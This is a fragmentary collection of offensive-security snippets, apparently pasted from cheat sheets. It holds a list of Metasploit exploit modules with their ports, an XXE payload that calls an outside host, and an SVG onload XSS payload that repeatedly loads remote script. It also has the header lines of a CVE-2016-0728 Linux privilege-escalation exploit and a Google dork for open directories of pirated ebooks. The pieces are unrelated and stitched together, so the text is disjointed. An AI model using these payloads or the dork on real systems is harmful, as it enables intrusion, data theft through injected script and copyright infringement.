| exploit/osx/mdns/upnp_location: RPORT 0 | |
| exploit/windows/dcerpc/ms07_029_msdns_zonename: RPORT 0 | |
| exploit/windows/scada/igss9_misc: RPORT 0 | |
| exploit/windows/firewall/blackice_pam_icq: RPORT 1 | |
| exploit/windows/http/altn_webadmin: RPORT 1000 | |
| exploit/unix/webapp/webmin_show_cgi_exec: RPORT 10000 | |
| exploit/windows/backupexec/remote_agent: RPORT 10000 | |
| exploit/windows/oracle/osb_ndmp_auth: RPORT 10000 | |
| exploit/multi/misc/zend_java_bridge: RPORT 10001 | |
| exploit/windows/misc/gimp_script_fu: RPORT 10008 |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| <svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s); | |
| setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s); | |
| s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()> |
| /* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */ | |
| /* $ ./cve_2016_072 PP_KEY */ | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <sys/types.h> | |
| #include <keyutils.h> | |
| #include <unistd.h> | |
| #include <time.h> |
Paste this in the search box or use the URL that follows:
+(.MOBI|.CBZ|.CBR|.CBC|.CHM|.EPUB|.FB2|.LIT|.LRF|.ODT|.PDF|.PRC|.PDB|.PML|.RB|.RTF|.TCR) PUT EBOOK NAME HERE intitle:"index of" -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) -inurl:(listen77|mp3raid|mp3toss|mp3drug|index_of|wallywashis)